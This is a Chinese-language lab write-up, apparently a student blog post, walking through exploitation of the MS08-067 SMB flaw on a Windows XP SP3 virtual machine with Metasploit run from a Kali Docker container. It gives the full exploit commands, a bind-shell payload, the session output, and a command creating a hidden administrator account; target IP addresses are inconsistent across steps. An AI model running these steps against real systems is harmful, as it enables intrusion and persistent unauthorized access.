本人主专业信息对抗,结果跑去搞php,实属不务正业。。。。。。
最近要整个漏洞渗透测试实验,搞完后觉得挺有意思所以就写出来分享一下。
MS08-067漏洞会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta
1.安装靶机
下载window xp sp3 英文版镜像并安装在vmvare虚拟机上 靶机ip:192.168.65.128
2.安装kali linux以及Metasploit框架
ps:系统和框架都是通过docker进行安装操作的,所以需要先了解一下docker
运行docker 输入命令 docker pull kalilinux/kali-linux-docker 获取kali linux镜像
输入 docker -it --name kali_linux -p 0.0.0.0:8080:80 kalilinux/kali-linux-docker /bin/bash
创建容器并交互式运行容器 容器ip: 172.17.0.2
输入 git clone --depth=1 git://github.com/rapid7/metasploit-framework metasploit
获取metasploit框架
完成后输入 cd ./metasploit进入框架目录
root@b2e6af248097:/metasploit# ./msfconsole
输入 ./msfconsole 运行框架,成功后按如下步骤
msf5 > use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻击程序
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 172.17.0.2:#设置本地主机IP
LHOST => 172.17.0.2:
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.65.128 #设置目标主机IP
RHOST => 192.168.65.129
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell_bind_tcp #设置payload
payload => windows/shell_bind_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options #查看配置
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.65.129 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 192.168.65.129 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf5 exploit(windows/smb/ms08_067_netapi) > exploit #实施攻击
[*] 192.168.46.129:445 - Automatically detecting the target...
[*] 192.168.46.129:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.46.129:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.46.129:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.46.129:4444
[*] Command shell session 1 opened (172.17.0.2:37763 -> 192.168.46.129:4444) at 2018-11-09 09:59:01 +0000
C:\WINDOWS\system32>
攻击成功,获取到目标主机cmdshell
接下来新建账号 添加用户名为xiayujie,密码为xiayujie的用户,并把xiayujie用户添加到管理组
C:\WINDOWS\system32>net user xiayujie xiayujie /add && net localgroup administrators xiayujie /add
net user xiayujie xiayujie /add && net localgroup administrators xiayujie /add
The command completed successfully. #添加成功
有了cmdshell权限,接下来想做什么就都可以了